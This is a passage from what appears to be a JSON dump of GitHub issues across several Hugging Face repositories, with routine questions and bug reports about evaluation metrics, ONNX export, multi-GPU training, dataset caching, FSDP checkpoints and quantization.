I've also noticed that when I create Assistants on my side they do not show up on community tabs either they are purely user restricted, I am missing something? I've configured the hf token and the API base, any hints are appreciated.\r\n\r\n![image](https://github.com/huggingface/chat-ui/assets/165610201/f10307a3-17c4-4e0c-9036-1f63237e2f72)\r\n", "url": "https://github.com/huggingface/chat-ui/issues/997", "state": "closed", "labels": [ "help wanted", "assistants" ], "created_at": "2024-04-09T12:44:49Z", "updated_at": "2024-04-23T06:09:47Z", "comments": 2, "user": "Coinficient" }, { "repo": "huggingface/evaluate", "number": 570, "title": "[Question] How to have no preset values sent into `.compute()` ", "body": "We've a use-case https://huggingface.co/spaces/alvations/llm_harness_mistral_arc/blob/main/llm_harness_mistral_arc.py\r\n\r\nwhere default feature input types for `evaluate.Metric` is nothing and we get something like this in our `llm_harness_mistral_arc/llm_harness_mistral_arc.py`\r\n\r\n```python\r\nimport evaluate\r\nimport datasets\r\nimport lm_eval\r\n\r\n\r\n@evaluate.utils.file_utils.add_start_docstrings(_DESCRIPTION, _KWARGS_DESCRIPTION)\r\nclass llm_harness_mistral_arc(evaluate.Metric):\r\n def _info(self):\r\n # TODO: Specifies the evaluate.EvaluationModuleInfo object\r\n return evaluate.MetricInfo(\r\n # This is the description that will appear on the modules page.\r\n module_type=\"metric\",\r\n description=\"\",\r\n citation=\"\",\r\n inputs_description=\"\",\r\n # This defines the format of each prediction and reference\r\n features={},\r\n )\r\n\r\n def _compute(self, pretrained=None, tasks=[]):\r\n outputs = lm_eval.simple_evaluate( \r\n model=\"hf\",\r\n model_args={\"pretrained\":pretrained},\r\n tasks=tasks,\r\n num_fewshot=0,\r\n )\r\n results = {}\r\n for task in outputs['results']:\r\n results[task] = {'acc':outputs['results'][task]['acc,none'], \r\n 'acc_norm':outputs['results'][task]['acc_norm,none']}\r\n return results\r\n```\r\n\r\nAnd in our expected user-behavior is something like, [in]:\r\n\r\n```python\r\nimport evaluate\r\n\r\nmodule = evaluate.load(\"alvations/llm_harness_mistral_arc\")\r\nmodule.compute(pretrained=\"mistralai/Mistral-7B-Instruct-v0.2\", tasks=[\"arc_easy\"])\r\n```\r\n\r\nAnd the expected output as per our `tests.py`, https://huggingface.co/spaces/alvations/llm_harness_mistral_arc/blob/main/tests.py [out]:\r\n\r\n```\r\n{'arc_easy': {'acc': 0.8131313131313131, 'acc_norm': 0.7680976430976431}}\r\n```\r\n\r\nBut the `evaluate.Metric.compute()` somehow expects a default batch and `module.compute(pretrained=\"mistralai/Mistral-7B-Instruct-v0.2\", tasks=[\"arc_easy\"])` throws an error:\r\n\r\n```python\r\n---------------------------------------------------------------------------\r\nValueError Traceback (most recent call last)\r\n[](https://localhost:8080/#) in ()\r\n----> 1 module.compute(pretrained=\"mistralai/Mistral-7B-Instruct-v0.2\",\r\n 2 tasks=[\"arc_easy\"])\r\n\r\n2 frames\r\n[/usr/local/lib/python3.10/dist-packages/evaluate/module.py](https://localhost:8080/#) in _get_all_cache_files(self)\r\n 309 if self.num_process == 1:\r\n 310 if self.cache_file_name is None:\r\n--> 311 raise ValueError(\r\n 312 \"Evaluation module cache file doesn't exist. Please make sure that you call `add` or `add_batch` \"\r\n 313 \"at least once before calling `compute`.\"\r\n\r\nValueError: Evaluation module cache file doesn't exist. 
Please make sure that you call `add` or `add_batch` at least once before calling `compute`.\r\n```\r\n\r\n\r\n#### Q: Is it possible for the `.compute()` to expect no features? \r\n\r\n\r\nI've also tried this but somehow the `evaluate.Metric.compute` is still looking for some sort of `predictions` variable.\r\n\r\n```\r\n@evaluate.utils.file_utils.add_start_docstrings(_DESCRIPTION, _KWARGS_DESCRIPTION)\r\nclass llm_harness_mistral_arc(evaluate.Metric):\r\n def _info(self):\r\n # TODO: Specifies the evaluate.EvaluationModuleInfo object\r\n return evaluate.MetricInfo(\r\n # This is the description that will appear on the modules page.\r\n module_type=\"metric\",\r\n description=\"\",\r\n citation=\"\",\r\n inputs_description=\"\",\r\n # This defines the format of each prediction and reference\r\n features=[\r\n datasets.Features(\r\n {\r\n \"pretrained\": datasets.Value(\"string\", id=\"sequence\"),\r\n \"tasks\": datasets.Sequence(datasets.Value(\"string\", id=\"sequence\"), id=\"tasks\"),\r\n }\r\n )]\r\n )\r\n\r\n def _compute(self, pretrained, tasks):\r\n outputs = lm_eval.simple_evaluate( \r\n model=\"hf\",\r\n model_args={\"pretrained\":pretrained},\r\n tasks=tasks,\r\n num_fewshot=0,\r\n )\r\n results = {}\r\n for task in outputs['results']:\r\n results[task] = {'acc':outputs['results'][task]['acc,none'], \r\n 'acc_norm':outputs['results'][task]['acc_norm,none']}\r\n return results\r\n````\r\n\r\nthen:\r\n\r\n```python\r\nimport evaluate\r\n\r\nmodule = evaluate.load(\"alvations/llm_harness_mistral_arc\")\r\nmodule.compute(pretrained=\"mistralai/Mistral-7B-Instruct-v0.2\", tasks=[\"arc_easy\"])\r\n```\r\n\r\n[out]:\r\n\r\n```\r\n---------------------------------------------------------------------------\r\nKeyError Traceback (most recent call last)\r\n[\r\n\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [X] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\noptimum-cli export onnx --model Qwen/Qwen-7B qwen_optimum_onnx/ --trust-remote-code\n\n### Expected behavior\n\nI would expect Optimum to successfully export the Qwen model to ONNX format without encountering any errors or issues.", "url": "https://github.com/huggingface/optimum/issues/1798", "state": "open", "labels": [ "bug" ], "created_at": "2024-04-08T11:36:09Z", "updated_at": "2024-04-08T11:36:09Z", "comments": 0, "user": "Harini-Vemula-2382" }, { "repo": "huggingface/chat-ui", "number": 986, "title": "Github actions won't push built docker images on releases", "body": "We currently have a [github actions workflow](https://github.com/huggingface/chat-ui/blob/main/.github/workflows/build-image.yml) that builds an image on every push to `main` and tags it with `latest` and the commit id. [(see here)](https://github.com/huggingface/chat-ui/pkgs/container/chat-ui/versions)\r\n\r\nThe workflow should also push images tagged for each releases, for example `v0.8` but the workflow [fails](https://github.com/huggingface/chat-ui/actions/runs/8536772524) with a `buildx failed with: ERROR: tag is needed when pushing to registry` error. 
\r\n\r\nI think it would be really nice to have support for tagged images for each release, but I'm not the best with GitHub Actions, so if someone has some time and would like to look at it, that would be super appreciated \ud83e\udd17 ", "url": "https://github.com/huggingface/chat-ui/issues/986", "state": "closed", "labels": [ "help wanted", "CI/CD" ], "created_at": "2024-04-08T07:51:13Z", "updated_at": "2024-04-08T11:27:42Z", "comments": 2, "user": "nsarrazin" }, { "repo": "huggingface/candle", "number": 2025, "title": "How to specify which graphics card to run a task on in a server with multiple graphics cards?", "body": "", "url": "https://github.com/huggingface/candle/issues/2025", "state": "closed", "labels": [], "created_at": "2024-04-07T10:48:35Z", "updated_at": "2024-04-07T11:05:52Z", "user": "lijingrs" }, { "repo": "huggingface/text-embeddings-inference", "number": 229, "title": "Question: How to add a prefix to the underlying server", "body": "I've managed to run text-embeddings-inference perfectly using the already-built docker images, and I'm trying to expose it to our internal components.\r\n\r\nRight now they share the following URL pattern:\r\n\r\nMyhost.com/modelname/v1/embeddings\r\n\r\nI was wondering whether this \"model name\" can be added as a prefix inside the application through some configuration.\r\n\r\nHow could I do that?", "url": "https://github.com/huggingface/text-embeddings-inference/issues/229", "state": "closed", "labels": [], "created_at": "2024-04-06T17:29:59Z", "updated_at": "2024-04-08T09:14:40Z", "user": "Ryojikn" }, { "repo": "huggingface/transformers.js", "number": 685, "title": "Transformers.js seems to need an internet connection when it shouldn't? (Error: no available backend found.)", "body": "### Question\n\nWhat is the recommended way to get Transformers.js to work even when, later on, there is no internet connection?\r\n\r\nIs it using a service worker? Or are there other (perhaps hidden) settings for managing caching of files?\r\n\r\nI'm assuming here that the `Error: no available backend found` error message is related to Transformers.js not being able to find files once Wi-Fi has been turned off. I was a bit surprised by that, since I do see a cache called `transformers-cache` being created. Is that not caching all the required files?\r\n", "url": "https://github.com/huggingface/transformers.js/issues/685", "state": "open", "labels": [ "question" ], "created_at": "2024-04-06T12:40:15Z", "updated_at": "2024-09-03T01:22:15Z", "user": "flatsiedatsie" }, { "repo": "huggingface/trl", "number": 1510, "title": "[question] how to apply model parallelism to solve a CUDA memory error", "body": "Hi team. I am using the SFT and PPO code to train my model; link: https://github.com/huggingface/trl/tree/main/examples/scripts.\r\n\r\nDue to the long context length and 7B-level model size, I am facing a CUDA memory issue on my single GPU.\r\n\r\nIs there any straightforward way to utilize multiple GPUs on my server to train the model through the SFT and PPO scripts,\r\nsuch as splitting the model across multiple GPUs with model parallelism (see the sketch below)?
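For reference, one hedged sketch of the naive model parallelism being asked about (the model name is copied from the command below; everything else is illustrative, and this only splits the model's layers across the visible GPUs rather than doing data-parallel training):

```python
import torch
from transformers import AutoModelForCausalLM

# device_map="auto" shards the layers across all visible GPUs at load time,
# so a model too large for one card can still be fine-tuned, albeit slowly.
model = AutoModelForCausalLM.from_pretrained(
    "mistralai/Mistral-7B-Instruct-v0.2",
    device_map="auto",
    torch_dtype=torch.bfloat16,
)
print(model.hf_device_map)  # shows which layers landed on which GPU
```

A model loaded this way can then be passed to the trainer directly instead of via `model_name_or_path`.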
Are there any arguments I can pass directly to my training script?\r\nThanks a lot.\r\n```\r\nexport CUDA_VISIBLE_DEVICES='7'; python examples/scripts/sft_travel.py \\\r\n --model_name_or_path=\"mistralai/Mistral-7B-Instruct-v0.2\" \\\r\n --report_to=\"wandb\" \\\r\n --learning_rate=5e-5 \\\r\n --per_device_train_batch_size=4 \\\r\n --gradient_accumulation_steps=16 \\\r\n --logging_steps=1 \\\r\n --num_train_epochs=120 \\\r\n --lr_scheduler_type \"constant\" \\\r\n --max_steps=-1 \\\r\n --gradient_checkpointing \\\r\n --max_seq_length 16000 \\\r\n --output_dir \"8bit\" \\\r\n --overwrite_output_dir True \\\r\n --logging_strategy \"epoch\" \\\r\n --evaluation_strategy \"no\"\r\n```", "url": "https://github.com/huggingface/trl/issues/1510", "state": "closed", "labels": [], "created_at": "2024-04-06T02:09:36Z", "updated_at": "2024-05-06T17:02:35Z", "user": "yanan1116" }, { "repo": "huggingface/dataset-viewer", "number": 2667, "title": "Rename datasets-server to dataset-viewer in infra internals?", "body": "Follow-up to #2650.\r\n\r\nIs it necessary? Not urgent in any case.\r\n\r\nSome elements to review:\r\n- [ ] https://github.com/huggingface/infra\r\n- [ ] https://github.com/huggingface/infra-deployments\r\n- [ ] docker image tags (https://hub.docker.com/r/huggingface/datasets-server-services-search -> https://hub.docker.com/r/huggingface/dataset-viewer-services-search)\r\n- [ ] Helm chart name\r\n- [ ] AWS parameters\r\n- [ ] kubernetes namespaces\r\n- [ ] Hub app names and tokens\r\n- [ ] https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/datasets-server\r\n- [ ] buckets: hf-datasets-server-statics-test, hf-datasets-server-statics\r\n- [ ] MongoDB databases\r\n- [ ] BetterUptime\r\n- [ ] shared directories (PARQUET_METADATA_CACHE_APPNAME)\r\n", "url": "https://github.com/huggingface/dataset-viewer/issues/2667", "state": "closed", "labels": [ "question", "P2" ], "created_at": "2024-04-05T16:53:34Z", "updated_at": "2024-04-08T09:26:14Z", "user": "severo" }, { "repo": "huggingface/dataset-viewer", "number": 2666, "title": "Change API URL to dataset-viewer.huggingface.co?", "body": "Follow-up to https://github.com/huggingface/dataset-viewer/issues/2650\r\n\r\nShould we do it?\r\n- https://github.com/huggingface/dataset-viewer/issues/2650#issuecomment-2040217875\r\n- https://github.com/huggingface/moon-landing/pull/9520#issuecomment-2040220911\r\n\r\nIf we change it, we would have to update:\r\n- moon-landing\r\n- datasets\r\n- the docs (hub, datasets, dataset-viewer)\r\n- other written support (blog, observable, notion...)\r\n\r\nIf so, also change the dev URL: https://datasets-server.us.dev.moon.huggingface.tech.\r\n\r\nWe should also handle the redirection from the old URL to the new one.", "url": "https://github.com/huggingface/dataset-viewer/issues/2666", "state": "closed", "labels": [ "question", "P2" ], "created_at": "2024-04-05T16:49:13Z", "updated_at": "2024-04-08T09:24:43Z", "user": "severo" }, { "repo": "huggingface/huggingface.js", "number": 609, "title": "[Question] What is the correct way to access commit diff results via http?", "body": "Data I am interested in:\r\n![image](https://github.com/huggingface/huggingface.js/assets/16808224/cada880a-bc46-496b-869b-02adb083b6a7)\r\nHere's the endpoint to list commits:\r\nhttps://huggingface.co/api/models/SimonMA/Codellama-7b-lora-rps-adapter/commits/main", "url": "https://github.com/huggingface/huggingface.js/issues/609", "state": "closed", "labels": [], "created_at": "2024-04-05T12:00:15Z", 
"updated_at": "2024-04-09T18:40:05Z", "user": "madgetr" }, { "repo": "huggingface/dataset-viewer", "number": 2661, "title": "Increase the number of backfill workers?", "body": "Today, it's 8. Let's try increasing it and see if it speeds up the backfill job.\r\n\r\nThe current throughput is 577 datasets/minute.", "url": "https://github.com/huggingface/dataset-viewer/issues/2661", "state": "open", "labels": [ "question", "P2", "prod" ], "created_at": "2024-04-05T10:42:11Z", "updated_at": "2024-04-05T16:42:13Z", "user": "severo" }, { "repo": "huggingface/transformers", "number": 30066, "title": "How to calculate the mAP on this network?", "body": "### System Info\r\n\r\nI want to evaluate my network with the mean Average Precision. I don't know how to get the class-id of my gt data. Are there any examples to calculate the mAP with this library?\r\n\r\nI use the DetrForObjectDetection with my own dataset.\r\n\r\n### Who can help?\r\n\r\n_No response_\r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [ ] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\nthis is my code to save the loss in a csv file. I also want to save the mAP in this file.\r\n\r\n def on_train_epoch_end(self, trainer, pl_module):\r\n train_loss = trainer.callback_metrics.get(\"training_loss\").item()\r\n val_loss = trainer.callback_metrics.get(\"validation/loss\").item()\r\n with open(self.file_path, 'a', newline='') as csvfile:\r\n writer = csv.writer(csvfile)\r\n if not self.header_written:\r\n writer.writerow([\"Epoch\", \"Train Loss\", \"Validation Loss\"])\r\n self.header_written = True\r\n writer.writerow([pl_module.current_epoch, train_loss, val_loss])\r\n\r\n### Expected behavior\r\n\r\nI tried to get the data with this code:\r\n\r\n gt_boxes = []\r\n detected_boxes = []\r\n for batch in self.val_dataloader:\r\n pixel_values = batch['pixel_values'].to(pl_module.device)\r\n pixel_mask = batch['pixel_mask'].to(pl_module.device)\r\n labels = batch['labels']\r\n # train_idx = batch['train_idx']\r\n outputs = pl_module(pixel_values=pixel_values, pixel_mask=pixel_mask)\r\n \r\n target_sizes = torch.tensor([image.shape[-2:] for image in pixel_values]).to(pixel_values.device)\r\n detections = image_processor.post_process_object_detection(outputs, target_sizes=target_sizes, threshold=0.5)[0]\r\n\r\n for i in range(len(detections['scores'])):\r\n prob_score = detections['scores'][i].item()\r\n class_pred = detections['labels'][i].item()\r\n box = detections['boxes'][i].detach().cpu().numpy()\r\n \r\n detected_boxes.append([class_pred, prob_score, *box])\r\n \r\n for label in labels:\r\n gt_box = label['boxes']\r\n for box in gt_box:\r\n gt_boxes.append(box)\r\n \r\n image_height = 2048\r\n image_width = 2048\r\n\r\n gt_boxes_abs = []\r\n for box in gt_boxes:\r\n x_min, y_min, width, height = box\r\n x_max = x_min + width\r\n y_max = y_min + height\r\n x_min_abs = int(x_min * image_width)\r\n y_min_abs = int(y_min * image_height)\r\n x_max_abs = int(x_max * image_width)\r\n y_max_abs = int(y_max * image_height)\r\n \r\n class_id = ???\r\n difficult = ???\r\n crowd = ???\r\n \r\n gt_boxes_abs.append([x_min_abs, y_min_abs, x_max_abs, y_max_abs, class_id, difficult, crowd])\r\n \r\n adjusted_detected_boxes = []\r\n converted_boxes = []\r\n for box in detected_boxes:\r\n class_id = box[0]\r\n confidence = box[1]\r\n x_min = box[2]\r\n y_min = 
box[3]\r\n x_max = box[4]\r\n y_max = box[5]\r\n converted_boxes.append([x_min, y_min, x_max, y_max, class_id, confidence])", "url": "https://github.com/huggingface/transformers/issues/30066", "state": "closed", "labels": [], "created_at": "2024-04-05T08:32:31Z", "updated_at": "2024-06-08T08:04:08Z", "user": "Sebi2106" }, { "repo": "huggingface/optimum-quanto", "number": 152, "title": "How does quanto calibrate torch functions?", "body": "I have learned quanto calibrate ops in module forms by adding module hooks, but how about torch functions like `torch.sigmoid`, `torch.elu`, and `torch.log` etc?\r\nI think the output scale of `torch.sigmoid` could be directly evaluated similarly to quanto's approach with `softmax`. Additionally, `torch.elu` might be substituted with `torch.nn.ELU`.\r\nHowever, I'm uncertain how functions like `torch.log`, which are unbounded and lack explicit module forms will be calibrated within quanto.", "url": "https://github.com/huggingface/optimum-quanto/issues/152", "state": "closed", "labels": [ "question" ], "created_at": "2024-04-05T06:49:51Z", "updated_at": "2024-04-11T09:41:55Z", "user": "shuokay" }, { "repo": "huggingface/candle", "number": 2007, "title": "How to run inference of a (very) large model across mulitple GPUs ?", "body": "It is mentioned on README that candle supports multi GPU inference, using NCCL under the hood. How can this be implemented ? I wonder if there is any available example to look at..\r\n\r\nAlso, I know PyTorch has things like DDP and FSDP, is candle support for multi GPU inference comparable to these techniques ? ", "url": "https://github.com/huggingface/candle/issues/2007", "state": "open", "labels": [], "created_at": "2024-04-04T13:52:46Z", "updated_at": "2024-08-12T04:53:54Z", "user": "jorgeantonio21" }, { "repo": "huggingface/candle", "number": 2006, "title": "How to get different outputs for the same prompt?", "body": "I used a gemma, it always returned same outputs for same prompt.\r\nHow can I get different outputs? Is there any method or parameter for sampling? (I even doubt that `top_p` works.)\r\n", "url": "https://github.com/huggingface/candle/issues/2006", "state": "closed", "labels": [], "created_at": "2024-04-04T10:43:31Z", "updated_at": "2024-04-13T11:17:36Z", "user": "Hojun-Son" }, { "repo": "huggingface/chat-ui", "number": 975, "title": "is it possible to hide the setting from the users? most users do not want to create assistants, and they just want to use existing ones. ", "body": "In the left-hand corner of hugginchat, \"Assistants\" and \"Settings\" are visible. We are considering whether it is possible to hide these options from our users, as they have expressed no interest in creating assistants and prefer to use existing ones. Many thanks for your kind help.. Howard", "url": "https://github.com/huggingface/chat-ui/issues/975", "state": "open", "labels": [], "created_at": "2024-04-04T07:33:25Z", "updated_at": "2024-04-04T07:33:25Z", "comments": 0, "user": "hjchenntnu" }, { "repo": "huggingface/transformers.js", "number": 679, "title": "Speech Recognition/Whisper word level scores or confidence output", "body": "### Question\n\nHey,\r\nBig thanks for awesome project!\r\n\r\nIt possible to add score/confidence for word level output when using Speech Recognition/Whisper model?\r\nWould appreciate any direction/comments or suggestion where to dig to add it. 
\r\nHappy to submit PR if I will success in it.\r\n\r\nThanks!\r\n", "url": "https://github.com/huggingface/transformers.js/issues/679", "state": "open", "labels": [ "question" ], "created_at": "2024-04-04T07:04:00Z", "updated_at": "2024-04-04T07:04:00Z", "user": "wobbble" }, { "repo": "huggingface/transformers", "number": 30034, "title": "What is the data file format of `run_ner.py`?", "body": "### Feature request\r\n\r\nWhat is the correct format for custom dataset in run_ner.py? Would it be possible to include a few lines on this with a helpful example? \r\n\r\n### Motivation\r\n\r\nI am using the example script run_ner.py from [huggingface](https://github.com/huggingface)/transformers It is not possible to use standard conll format for the model fine-tuning of run_ner.\r\n\r\n### Your contribution\r\n\r\nWe could include this in the corresponding readme.", "url": "https://github.com/huggingface/transformers/issues/30034", "state": "closed", "labels": [ "Good First Issue" ], "created_at": "2024-04-04T06:36:30Z", "updated_at": "2024-04-08T11:50:00Z", "user": "sahil3773mehta" }, { "repo": "huggingface/datasets", "number": 6777, "title": ".Jsonl metadata not detected", "body": "### Describe the bug\n\nHi I have the following directory structure:\r\n|--dataset\r\n| |-- images\r\n| |-- metadata1000.csv\r\n| |-- metadata1000.jsonl\r\n| |-- padded_images\r\n\r\nExample of metadata1000.jsonl file\r\n{\"caption\": \"a drawing depicts a full shot of a black t-shirt with a triangular pattern on the front there is a white label on the left side of the triangle\", \"image\": \"images/212734.png\", \"gaussian_padded_image\": \"padded_images/p_212734.png\"}\r\n{\"caption\": \"an eye-level full shot of a large elephant and a baby elephant standing in a watering hole on the left side is a small elephant with its head turned to the right of dry land, trees, and bushes\", \"image\": \"images/212735.png\", \"gaussian_padded_image\": \"padded_images/p_212735.png\"}\r\n.\r\n.\r\n.\r\n\r\nI'm trying to use dataset = load_dataset(\"imagefolder\", data_dir='/dataset/', split='train') to load the the dataset, however it is not able to load according to the fields in the metadata1000.jsonl .\r\nplease assist to load the data properly\r\n\r\nalso getting \r\n\r\n```\r\n File \"/workspace/train_trans_vae.py\", line 1089, in \r\n print(get_metadata_patterns('/dataset/'))\r\n File \"/opt/conda/lib/python3.10/site-packages/datasets/data_files.py\", line 499, in get_metadata_patterns\r\n raise FileNotFoundError(f\"The directory at {base_path} doesn't contain any metadata file\") from None\r\nFileNotFoundError: The directory at /dataset/ doesn't contain any metadata file\r\n```\r\n\r\nwhen trying \r\n\r\n```\r\n from datasets.data_files import get_metadata_patterns\r\n print(get_metadata_patterns('/dataset/'))\r\n```\r\n\r\n\r\n\n\n### Steps to reproduce the bug\n\ndataset Version: 2.18.0\r\nmake a similar jsonl and similar directory format\n\n### Expected behavior\n\ncreates a dataset object with the column names, caption,image,gaussian_padded_image\n\n### Environment info\n\ndataset Version: 2.18.0", "url": "https://github.com/huggingface/datasets/issues/6777", "state": "open", "labels": [], "created_at": "2024-04-04T06:31:53Z", "updated_at": "2024-04-05T21:14:48Z", "comments": 5, "user": "nighting0le01" }, { "repo": "huggingface/lighteval", "number": 143, "title": "Do an intro notebook on how to use `lighteval`", "body": "", "url": "https://github.com/huggingface/lighteval/issues/143", "state": "closed", "labels": [ 
"documentation" ], "created_at": "2024-04-03T07:53:25Z", "updated_at": "2024-12-05T10:18:42Z", "user": "clefourrier" }, { "repo": "huggingface/accelerate", "number": 2614, "title": "How to I selectively apply accelerate to trainers", "body": "I have two trainers in a script, one is SFTTrainer and one is PPOTrainer, both from trl library. Is it possible to only apply accelerate to PPOTrainer?", "url": "https://github.com/huggingface/accelerate/issues/2614", "state": "closed", "labels": [], "created_at": "2024-04-03T06:39:05Z", "updated_at": "2024-05-21T15:06:36Z", "user": "zyzhang1130" }, { "repo": "huggingface/sentence-transformers", "number": 2568, "title": "How to improve sentence-transformers' performance on CPU?", "body": "On the CPU, I tried huggingface\u2018s optimization.onnx and sentence_transformers and I found that on the task of feature_extraction, optimization.onnx was not as good as sentence_transformers in batch encoding performance.\r\nMy question is, are sentence_transformers the current ceiling on CPU performance?", "url": "https://github.com/huggingface/sentence-transformers/issues/2568", "state": "closed", "labels": [], "created_at": "2024-04-03T02:09:14Z", "updated_at": "2024-04-23T09:17:39Z", "user": "chensuo2048" }, { "repo": "huggingface/datasets", "number": 6773, "title": "Dataset on Hub re-downloads every time?", "body": "### Describe the bug\r\n\r\nHi, I have a dataset on the hub [here](https://huggingface.co/datasets/manestay/borderlines). It has 1k+ downloads, which I sure is mostly just me and my colleagues working with it. It should have far fewer, since I'm using the same machine with a properly set up HF_HOME variable. However, whenever I run the below function `load_borderlines_hf`, it downloads the entire dataset from the hub and then does the other logic:\r\nhttps://github.com/manestay/borderlines/blob/4e161f444661e2ebfe643f3fe149d9258d63a57d/run_gpt/lib.py#L80\r\n\r\nLet me know what I'm doing wrong here, or if it's a bug with the `datasets` library itself. On the hub I have my data stored in CSVs, but several columns are lists, so that's why I have the code to map splitting on `;`. I looked into dataset loading scripts, but it seemed difficult to set up. I have verified that other `datasets` and `models` on my system are using the cache properly (e.g. I have a 13B parameter model and large datasets, but those are cached and don't redownload).\r\n\r\n__EDIT: __ as pointed out in the discussion below, it may be the `map()` calls that aren't being cached properly. Supposing the `load_dataset()` retrieve from the cache, then it should be the case that the `map()` calls also retrieve from the cached output. But the `map()` commands re-execute sometimes.\r\n\r\n### Steps to reproduce the bug\r\n\r\n1. Copy and paste the function from [here](https://github.com/manestay/borderlines/blob/4e161f444661e2ebfe643f3fe149d9258d63a57d/run_gpt/lib.py#L80) (lines 80-100)\r\n2. Run it in Python `load_borderlines_hf(None)`\r\n3. It completes successfully, downloading from HF hub, then doing the mapping logic etc.\r\n4. 
If you run it again after some time, it will re-download, ignoring the cache\r\n\r\n### Expected behavior\r\n\r\nRe-running the code, which calls `datasets.load_dataset('manestay/borderlines', 'territories')`, should use the cached version\r\n\r\n### Environment info\r\n\r\n\r\n- `datasets` version: 2.16.1\r\n- Platform: Linux-5.14.21-150500.55.7-default-x86_64-with-glibc2.31\r\n- Python version: 3.10.13\r\n- `huggingface_hub` version: 0.20.3\r\n- PyArrow version: 15.0.0\r\n- Pandas version: 1.5.3\r\n- `fsspec` version: 2023.10.0", "url": "https://github.com/huggingface/datasets/issues/6773", "state": "closed", "labels": [], "created_at": "2024-04-02T17:23:22Z", "updated_at": "2024-04-08T18:43:45Z", "comments": 5, "user": "manestay" }, { "repo": "huggingface/transformers.js", "number": 677, "title": "How do you debug/measure Python -> JavaScript ONNX conversion?", "body": "### Question\r\n\r\nI have converted a couple of ONNX models to use ONNXRuntimeWeb, using the Python onnx version as the source. I've spent weeks debugging, though. What's your strategy for comparing tensor values, etc., with these onnx models?\r\n\r\nI've console-logged a number of values from the tensor/array to see whether the values have diverged far, but it gets fatiguing. I can't simply dump a numpy array and compare", "url": "https://github.com/huggingface/transformers.js/issues/677", "state": "open", "labels": [ "question" ], "created_at": "2024-04-02T16:16:22Z", "updated_at": "2024-04-02T16:18:03Z", "user": "matbeedotcom" }, { "repo": "huggingface/transformers.js", "number": 676, "title": "How to use the fp16 version of the model file?", "body": "### Question\n\nexample files: https://huggingface.co/Xenova/modnet/tree/main/onnx", "url": "https://github.com/huggingface/transformers.js/issues/676", "state": "closed", "labels": [ "question" ], "created_at": "2024-04-02T12:10:24Z", "updated_at": "2024-04-03T02:56:52Z", "user": "cyio" }, { "repo": "huggingface/chat-ui", "number": 969, "title": "Display does not automatically update after receiving message", "body": "After receiving the message, the chat page does not update and is always in the loading state. The received message can only be displayed after refreshing the page or switching sessions.\r\n![image](https://github.com/huggingface/chat-ui/assets/34700131/19150fbd-346c-4cf4-840d-a1bda9649d09)\r\n", "url": "https://github.com/huggingface/chat-ui/issues/969", "state": "open", "labels": [ "question" ], "created_at": "2024-04-02T06:14:59Z", "updated_at": "2024-04-03T04:26:23Z", "user": "w4rw4r" }, { "repo": "huggingface/dataset-viewer", "number": 2654, "title": "Tutorial about how to start/run my own local dataset server.", "body": "Hey,\r\n I'm new to the dataset server and a rookie in the web field. I want to build my own dataset server; is there any tutorial that can guide me through it?\r\n\r\nMany thanks", "url": "https://github.com/huggingface/dataset-viewer/issues/2654", "state": "closed", "labels": [], "created_at": "2024-04-02T01:30:12Z", "updated_at": "2024-05-11T15:03:50Z", "user": "ANYMS-A" }, { "repo": "huggingface/accelerate", "number": 2603, "title": "How to load an FSDP checkpoint model", "body": "I have fine-tuned a Gemma 2B model using FSDP, and these are the files available under the checkpoint:\r\n\r\n```\r\noptimizer_0 pytorch_model_fsdp_0 rng_state_0.pth rng_state_1.pth scheduler.pt trainer_state.json\r\n```\r\nHow can I load the above FSDP checkpoint?
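A hedged sketch of one way to restore such a directory (assumptions: the checkpoint was produced via accelerate's FSDP integration, and the script is launched with `accelerate launch` using the same FSDP config; the paths and model below are placeholders):

```python
import torch
from accelerate import Accelerator

accelerator = Accelerator()
model = torch.nn.Linear(8, 8)                      # stand-in for the fine-tuned model
optimizer = torch.optim.AdamW(model.parameters())
model, optimizer = accelerator.prepare(model, optimizer)

# Restores the sharded model/optimizer states and the rng_state_*.pth files
# from a folder like the one listed above.
accelerator.load_state("output/checkpoint")
```

If the checkpoint came from `transformers.Trainer`, passing `resume_from_checkpoint=<folder>` to `trainer.train()` is the more direct route.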
\r\n\r\nkindly help me with this issue,\r\n", "url": "https://github.com/huggingface/accelerate/issues/2603", "state": "closed", "labels": [], "created_at": "2024-04-01T16:53:24Z", "updated_at": "2024-05-11T15:06:21Z", "user": "nlpkiddo-2001" }, { "repo": "huggingface/datasets", "number": 6769, "title": "(Willing to PR) Datasets with custom python objects", "body": "### Feature request\r\n\r\nHi thanks for the library! I would like to have a huggingface Dataset, and one of its column is custom (non-serializable) Python objects. For example, a minimal code:\r\n\r\n```\r\nclass MyClass:\r\n pass\r\n\r\ndataset = datasets.Dataset.from_list([\r\n dict(a=MyClass(), b='hello'),\r\n])\r\n```\r\n\r\nIt gives error:\r\n\r\n```\r\nArrowInvalid: Could not convert <__main__.MyClass object at 0x7a852830d050> with type MyClass: did not recognize Python value type when inferring an Arrow data type\r\n```\r\n\r\nI guess it is because Dataset forces to convert everything into arrow format. However, is there any ways to make the scenario work? Thanks!\r\n\r\n### Motivation\r\n\r\n(see above)\r\n\r\n### Your contribution\r\n\r\nYes, I am happy to PR!\r\n\r\nCross-posted: https://discuss.huggingface.co/t/datasets-with-custom-python-objects/79050?u=fzyzcjy\r\n\r\nEDIT: possibly related https://github.com/huggingface/datasets/issues/5766", "url": "https://github.com/huggingface/datasets/issues/6769", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-04-01T13:18:47Z", "updated_at": "2024-04-01T13:36:58Z", "comments": 0, "user": "fzyzcjy" }, { "repo": "huggingface/optimum-quanto", "number": 146, "title": "Question about the gradient of QTensor and QBitTensor", "body": "I am confused by the gradient of the Quantizer and QBitTensor. Take QTensor as the example:\r\n\r\nThe evaluation of forward is:\r\n```txt\r\ndata = base / scale (1)\r\ndata = round(data) (2)\r\ndata = clamp(data, qmin, qmax) (3)\r\n```\r\nI think the graidents should be:\r\n```txt\r\ngrad_div = 1 / scale (1)\r\ngrad_round = 1 (2) # refer to \"straight though estimator\": https://arxiv.org/abs/1308.3432\r\ngrad_clamp = 1 if qmin < data < qmax else 0 